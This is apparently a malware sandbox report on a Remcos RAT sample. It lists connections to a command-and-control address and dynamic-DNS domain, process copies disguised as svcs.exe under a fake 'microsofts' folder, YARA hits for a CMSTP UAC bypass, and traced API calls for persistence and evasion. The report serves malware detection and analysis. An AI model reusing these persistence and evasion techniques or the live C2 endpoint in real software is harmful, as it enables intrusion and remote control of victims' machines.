                              Mar 29, 2024 05:14:07.300962925 CET | 49716 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:14:15.300951958 CET | 49716 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:14:22.317720890 CET | 49718 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:14:23.488456964 CET | 49718 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:14:25.489357948 CET | 49718 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:14:29.488456964 CET | 49718 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:14:37.488524914 CET | 49718 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:14:44.505584002 CET | 49719 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:14:45.629630089 CET | 49719 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:14:47.631539106 CET | 49719 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:14:51.629125118 CET | 49719 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:14:59.629357100 CET | 49719 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:15:06.962080956 CET | 49720 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:15:07.988382101 CET | 49720 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:15:09.988495111 CET | 49720 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:15:13.988365889 CET | 49720 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:15:22.097752094 CET | 49720 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:15:29.428069115 CET | 49721 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:15:30.441488981 CET | 49721 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:15:32.441493034 CET | 49721 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:15:36.628978968 CET | 49721 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:15:44.629071951 CET | 49721 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:15:51.645648956 CET | 49722 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:15:52.786807060 CET | 49722 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:15:54.800833941 CET | 49722 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:15:58.800843954 CET | 49722 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:16:06.801326036 CET | 49722 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:16:13.817409992 CET | 49723 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:16:14.931226015 CET | 49723 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:16:17.035185099 CET | 49723 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:16:21.128943920 CET | 49723 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:16:29.161470890 CET | 49723 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:16:36.255134106 CET | 49724 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:16:37.441416979 CET | 49724 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:16:39.441401958 CET | 49724 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:16:43.535145998 CET | 49724 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:16:51.592703104 CET | 49724 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:16:58.755367994 CET | 49725 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:16:59.800759077 CET | 49725 | 1998 | 192.168.2.5 | 185.196.11.223
                              Mar 29, 2024 05:17:01.894644022 CET | 49725 | 1998 | 192.168.2.5 | 185.196.11.223
                              Timestamp                          | Source Port | Dest Port | Source IP   | Dest IP
                              Mar 29, 2024 05:12:53.694591045 CET | 52750 | 53    | 192.168.2.5 | 1.1.1.1
                              Mar 29, 2024 05:12:54.013741016 CET | 53    | 52750 | 1.1.1.1     | 192.168.2.5
                              Mar 29, 2024 05:15:06.645446062 CET | 51625 | 53    | 192.168.2.5 | 1.1.1.1
                              Mar 29, 2024 05:15:06.960761070 CET | 53    | 51625 | 1.1.1.1     | 192.168.2.5
                              Timestamp                          | Source IP   | Dest IP | Trans ID | OP Code            | Name                 | Type           | Class       | DNS over HTTPS
                              Mar 29, 2024 05:12:53.694591045 CET | 192.168.2.5 | 1.1.1.1 | 0xfc4b   | Standard query (0) | leetboy.dynuddns.net | A (IP address) | IN (0x0001) | false
                              Mar 29, 2024 05:15:06.645446062 CET | 192.168.2.5 | 1.1.1.1 | 0x7c09   | Standard query (0) | leetboy.dynuddns.net | A (IP address) | IN (0x0001) | false
                              Timestamp                          | Source IP | Dest IP     | Trans ID | Reply Code   | Name                 | CName | Address        | Type           | Class       | DNS over HTTPS
                              Mar 29, 2024 05:12:54.013741016 CET | 1.1.1.1   | 192.168.2.5 | 0xfc4b   | No error (0) | leetboy.dynuddns.net |       | 185.196.11.223 | A (IP address) | IN (0x0001) | false
                              Mar 29, 2024 05:15:06.960761070 CET | 1.1.1.1   | 192.168.2.5 | 0x7c09   | No error (0) | leetboy.dynuddns.net |       | 185.196.11.223 | A (IP address) | IN (0x0001) | false


                              Target ID:0
                              Start time:05:12:52
                              Start date:29/03/2024
                              Path:C:\Users\user\Desktop\1m70ggeepT.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\1m70ggeepT.exe"
                              Imagebase:0x400000
                              File size:494'592 bytes
                              MD5 hash:06F5B8DFFC6C138828ADBC7F29CFC7F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1967511395.000000000076E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:1
                              Start time:05:12:52
                              Start date:29/03/2024
                              Path:C:\Users\user\AppData\Roaming\microsofts\svcs.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                              Imagebase:0x400000
                              File size:494'592 bytes
                              MD5 hash:06F5B8DFFC6C138828ADBC7F29CFC7F0
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: unknown
                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, Author: ditekSHen
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 79%, Virustotal, Browse
                              Reputation:low
                              Has exited:false

                              Target ID:3
                              Start time:05:13:02
                              Start date:29/03/2024
                              Path:C:\Users\user\AppData\Roaming\microsofts\svcs.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                              Imagebase:0x400000
                              File size:494'592 bytes
                              MD5 hash:06F5B8DFFC6C138828ADBC7F29CFC7F0
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Target ID:4
                              Start time:05:13:10
                              Start date:29/03/2024
                              Path:C:\Users\user\AppData\Roaming\microsofts\svcs.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                              Imagebase:0x400000
                              File size:494'592 bytes
                              MD5 hash:06F5B8DFFC6C138828ADBC7F29CFC7F0
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Target ID:6
                              Start time:05:13:19
                              Start date:29/03/2024
                              Path:C:\Users\user\AppData\Roaming\microsofts\svcs.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\microsofts\svcs.exe"
                              Imagebase:0x400000
                              File size:494'592 bytes
                              MD5 hash:06F5B8DFFC6C138828ADBC7F29CFC7F0
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true


                                Execution Graph

                                Execution Coverage:2.1%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:28.5%
                                Total number of Nodes:772
                                Total number of Limit Nodes:25
                                execution_graph (call-graph node and edge data behind the interactive Execution Graph view)
40cd0d 31 API calls 47558->47562 47560 40cec8 CopyFileW 47559->47560 47561 40cf99 47560->47561 47564 40ceda _wcslen 47560->47564 47836 40cd0d 47561->47836 47563 40ceb3 47562->47563 47563->47215 47564->47561 47566 40cef6 47564->47566 47567 40cf49 47564->47567 47570 40da34 32 API calls 47566->47570 47569 40da34 32 API calls 47567->47569 47573 40cf4f 47569->47573 47574 40cefc 47570->47574 47571 40cfdf 47572 40d027 CloseHandle 47571->47572 47576 40417e 28 API calls 47571->47576 47862 401f04 47572->47862 47577 401f13 28 API calls 47573->47577 47578 401f13 28 API calls 47574->47578 47575 40cfb3 47579 40cfbc SetFileAttributesW 47575->47579 47581 40cff5 47576->47581 47582 40cf43 47577->47582 47583 40cf08 47578->47583 47595 40cfcb _wcslen 47579->47595 47585 41bc5e 28 API calls 47581->47585 47591 401f09 11 API calls 47582->47591 47586 401f09 11 API calls 47583->47586 47584 40d043 ShellExecuteW 47587 40d060 ExitProcess 47584->47587 47588 40d056 47584->47588 47590 40d008 47585->47590 47592 40cf11 47586->47592 47589 40d069 CreateMutexA GetLastError 47588->47589 47589->47563 47869 413814 RegCreateKeyW 47590->47869 47593 40cf61 47591->47593 47594 40915b 28 API calls 47592->47594 47599 40cf6d CreateDirectoryW 47593->47599 47597 40cf25 47594->47597 47595->47571 47596 40cfdc SetFileAttributesW 47595->47596 47596->47571 47600 403014 28 API calls 47597->47600 47868 401f04 47599->47868 47601 40cf31 47600->47601 47605 401f13 28 API calls 47601->47605 47608 40cf3a 47605->47608 47606 401f09 11 API calls 47606->47572 47609 401f09 11 API calls 47608->47609 47609->47582 47610->47085 47611->47093 47612->47096 47614->47118 47616 40eba4 47615->47616 47617 413573 RegQueryValueExA RegCloseKey 47615->47617 47616->47115 47616->47133 47617->47616 47618->47121 47619->47151 47620->47145 47621->47135 47622->47149 47623->47219 47624->47239 47625->47201 47627 40209b 47626->47627 47628 4023ce 11 API calls 47627->47628 47629 4020a6 47628->47629 47922 4024ed 47629->47922 47632->47220 47633->47225 
47634->47231 47635->47242 47636->47250 47637->47261 47642 4344ef 47638->47642 47639 43bd51 ___std_exception_copy 21 API calls 47639->47642 47640 40f0d1 47640->47268 47642->47639 47642->47640 47926 442f80 7 API calls 2 library calls 47642->47926 47927 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47642->47927 47928 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47642->47928 47645->47297 47646->47310 47647->47285 47648->47290 47650->47318 47651->47327 47652->47140 47654->47163 47655->47175 47929 41ad17 105 API calls 47656->47929 47658 41b4c5 LoadResource LockResource SizeofResource 47657->47658 47659 40f3de 47657->47659 47658->47659 47660 43bd51 47659->47660 47665 446137 __Getctype 47660->47665 47661 446175 47677 4405dd 20 API calls __dosmaperr 47661->47677 47663 446160 RtlAllocateHeap 47664 446173 47663->47664 47663->47665 47664->47362 47665->47661 47665->47663 47676 442f80 7 API calls 2 library calls 47665->47676 47668 4020bf 47667->47668 47678 4023ce 47668->47678 47670 4020ca 47682 40250a 47670->47682 47672 4020d9 47672->47365 47674 4020b7 28 API calls 47673->47674 47675 406dec 47674->47675 47675->47372 47676->47665 47677->47664 47679 402428 47678->47679 47680 4023d8 47678->47680 47679->47670 47680->47679 47689 4027a7 11 API calls std::_Deallocate 47680->47689 47683 40251a 47682->47683 47684 402520 47683->47684 47685 402535 47683->47685 47690 402569 47684->47690 47700 4028e8 47685->47700 47688 402533 47688->47672 47689->47679 47711 402888 47690->47711 47692 40257d 47693 402592 47692->47693 47694 4025a7 47692->47694 47716 402a34 22 API calls 47693->47716 47695 4028e8 28 API calls 47694->47695 47699 4025a5 47695->47699 47697 40259b 47717 4029da 22 API calls 47697->47717 47699->47688 47701 4028f1 47700->47701 47702 402953 47701->47702 47703 4028fb 47701->47703 47725 4028a4 22 API calls 47702->47725 47706 402904 47703->47706 47707 402917 47703->47707 47719 402cae 47706->47719 47708 402915 47707->47708 47710 
4023ce 11 API calls 47707->47710 47708->47688 47710->47708 47712 402890 47711->47712 47713 402898 47712->47713 47718 402ca3 22 API calls 47712->47718 47713->47692 47716->47697 47717->47699 47720 402cb8 __EH_prolog 47719->47720 47726 402e54 22 API calls 47720->47726 47722 402d24 47723 4023ce 11 API calls 47722->47723 47724 402d92 47723->47724 47724->47708 47726->47722 47728 4020e7 47727->47728 47729 4023ce 11 API calls 47728->47729 47730 4020f2 47729->47730 47730->47400 47731->47400 47732->47400 47733->47390 47734->47381 47735->47404 47736->47408 47737->47410 47741 4032aa 47739->47741 47740 4032c9 47740->47420 47741->47740 47742 4028e8 28 API calls 47741->47742 47742->47740 47744 4051fb 47743->47744 47753 405274 47744->47753 47746 405208 47746->47423 47748 402061 47747->47748 47749 4023ce 11 API calls 47748->47749 47750 40207b 47749->47750 47758 40267a 47750->47758 47754 405282 47753->47754 47757 4028a4 22 API calls 47754->47757 47759 40268b 47758->47759 47760 4023ce 11 API calls 47759->47760 47761 40208d 47760->47761 47761->47426 47762->47428 47763->47439 47766 41bfc4 GetCurrentProcess IsWow64Process 47765->47766 47767 41b2d1 47765->47767 47766->47767 47768 41bfdb 47766->47768 47769 4135a6 RegOpenKeyExA 47767->47769 47768->47767 47770 4135d4 RegQueryValueExA RegCloseKey 47769->47770 47771 4135fe 47769->47771 47770->47771 47772 402093 28 API calls 47771->47772 47773 413613 47772->47773 47773->47450 47774->47458 47776 40b90c 47775->47776 47781 402252 47776->47781 47778 40b917 47785 40b92c 47778->47785 47780 40b926 47780->47469 47782 4022ac 47781->47782 47783 40225c 47781->47783 47782->47778 47783->47782 47792 402779 11 API calls std::_Deallocate 47783->47792 47786 40b966 47785->47786 47787 40b938 47785->47787 47804 4028a4 22 API calls 47786->47804 47793 4027e6 47787->47793 47791 40b942 47791->47780 47792->47782 47794 4027ef 47793->47794 47795 402851 47794->47795 47796 4027f9 47794->47796 47806 4028a4 22 API calls 47795->47806 47799 402802 47796->47799 47800 402815 
47796->47800 47805 402aea 28 API calls __EH_prolog 47799->47805 47802 402813 47800->47802 47803 402252 11 API calls 47800->47803 47802->47791 47803->47802 47805->47802 47807->47478 47809 402347 47808->47809 47810 402252 11 API calls 47809->47810 47811 4023c7 47810->47811 47811->47478 47813 401f8e 47812->47813 47814 402252 11 API calls 47813->47814 47815 401f99 47814->47815 47815->47485 47815->47486 47815->47487 47817 404186 47816->47817 47818 402252 11 API calls 47817->47818 47819 404191 47818->47819 47828 4041bc 28 API calls 47819->47828 47821 40419c 47821->47498 47822->47493 47823->47518 47824->47517 47825->47506 47826->47510 47827->47516 47828->47821 47830 401f86 11 API calls 47829->47830 47831 409167 47830->47831 47875 40314c 47831->47875 47833 409184 47879 40325d 47833->47879 47835 40918c 47835->47550 47837 40cd33 47836->47837 47838 40cd6f 47836->47838 47893 40b97c 47837->47893 47839 40cdb0 47838->47839 47841 40b97c 28 API calls 47838->47841 47842 40cdf1 47839->47842 47844 40b97c 28 API calls 47839->47844 47846 40cd86 47841->47846 47842->47571 47842->47575 47847 40cdc7 47844->47847 47845 403014 28 API calls 47848 40cd4f 47845->47848 47849 403014 28 API calls 47846->47849 47850 403014 28 API calls 47847->47850 47851 413814 14 API calls 47848->47851 47852 40cd90 47849->47852 47853 40cdd1 47850->47853 47854 40cd63 47851->47854 47855 413814 14 API calls 47852->47855 47856 413814 14 API calls 47853->47856 47857 401f09 11 API calls 47854->47857 47858 40cda4 47855->47858 47859 40cde5 47856->47859 47857->47838 47860 401f09 11 API calls 47858->47860 47861 401f09 11 API calls 47859->47861 47860->47839 47861->47842 47900 403222 47863->47900 47865 403022 47904 403262 47865->47904 47870 413866 47869->47870 47871 413829 47869->47871 47872 401f09 11 API calls 47870->47872 47874 413842 RegSetValueExW RegCloseKey 47871->47874 47873 40d01b 47872->47873 47873->47606 47874->47870 47876 403156 47875->47876 47877 4027e6 28 API calls 47876->47877 47878 403175 47876->47878 
47877->47878 47878->47833 47880 40323f 47879->47880 47883 4036a6 47880->47883 47882 40324c 47882->47835 47884 402888 22 API calls 47883->47884 47885 4036b9 47884->47885 47886 40372c 47885->47886 47887 4036de 47885->47887 47892 4028a4 22 API calls 47886->47892 47890 4027e6 28 API calls 47887->47890 47891 4036f0 47887->47891 47890->47891 47891->47882 47894 401f86 11 API calls 47893->47894 47895 40b988 47894->47895 47896 40314c 28 API calls 47895->47896 47897 40b9a4 47896->47897 47898 40325d 28 API calls 47897->47898 47899 40b9b7 47898->47899 47899->47845 47901 40322e 47900->47901 47910 403618 47901->47910 47903 40323b 47903->47865 47905 40326e 47904->47905 47906 402252 11 API calls 47905->47906 47907 403288 47906->47907 47908 402336 11 API calls 47907->47908 47909 403031 47908->47909 47909->47554 47911 403626 47910->47911 47912 403644 47911->47912 47913 40362c 47911->47913 47914 40365c 47912->47914 47915 40369e 47912->47915 47916 4036a6 28 API calls 47913->47916 47917 403642 47914->47917 47919 4027e6 28 API calls 47914->47919 47921 4028a4 22 API calls 47915->47921 47916->47917 47917->47903 47919->47917 47923 4024f9 47922->47923 47924 40250a 28 API calls 47923->47924 47925 4020b1 47924->47925 47925->47213 47926->47642 47937 4127ee 61 API calls 47933->47937 47938 44375d 47939 443766 47938->47939 47944 44377f 47938->47944 47940 44376e 47939->47940 47945 4437e5 47939->47945 47942 443776 47942->47940 47956 443ab2 22 API calls 2 library calls 47942->47956 47946 4437f1 47945->47946 47947 4437ee 47945->47947 47957 44f3dd GetEnvironmentStringsW 47946->47957 47947->47942 47952 443833 47952->47942 47953 443809 47965 446782 20 API calls __dosmaperr 47953->47965 47955 4437fe 47966 446782 20 API calls __dosmaperr 47955->47966 47956->47944 47958 44f3f1 47957->47958 47959 4437f8 47957->47959 47967 446137 47958->47967 47959->47955 47964 44390a 26 API calls 3 library calls 47959->47964 47961 44f405 ctype 47974 446782 20 API calls __dosmaperr 47961->47974 47963 44f41f 
FreeEnvironmentStringsW 47963->47959 47964->47953 47965->47955 47966->47952 47968 446175 47967->47968 47972 446145 __Getctype 47967->47972 47976 4405dd 20 API calls __dosmaperr 47968->47976 47970 446160 RtlAllocateHeap 47971 446173 47970->47971 47970->47972 47971->47961 47972->47968 47972->47970 47975 442f80 7 API calls 2 library calls 47972->47975 47974->47963 47975->47972 47976->47971 47977 43be58 47979 43be64 _swprintf ___DestructExceptionObject 47977->47979 47978 43be72 47993 4405dd 20 API calls __dosmaperr 47978->47993 47979->47978 47981 43be9c 47979->47981 47988 445888 EnterCriticalSection 47981->47988 47983 43be77 pre_c_initialization ___DestructExceptionObject 47984 43bea7 47989 43bf48 47984->47989 47988->47984 47990 43bf56 47989->47990 47992 43beb2 47990->47992 47995 44976c 36 API calls 2 library calls 47990->47995 47994 43becf LeaveCriticalSection std::_Lockit::~_Lockit 47992->47994 47993->47983 47994->47983 47995->47990 47996 40165e 47997 401666 47996->47997 47998 401669 47996->47998 47999 4016a8 47998->47999 48001 401696 47998->48001 48000 4344ea new 22 API calls 47999->48000 48003 40169c 48000->48003 48002 4344ea new 22 API calls 48001->48002 48002->48003

                                Control-flow Graph

                                APIs
                                • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
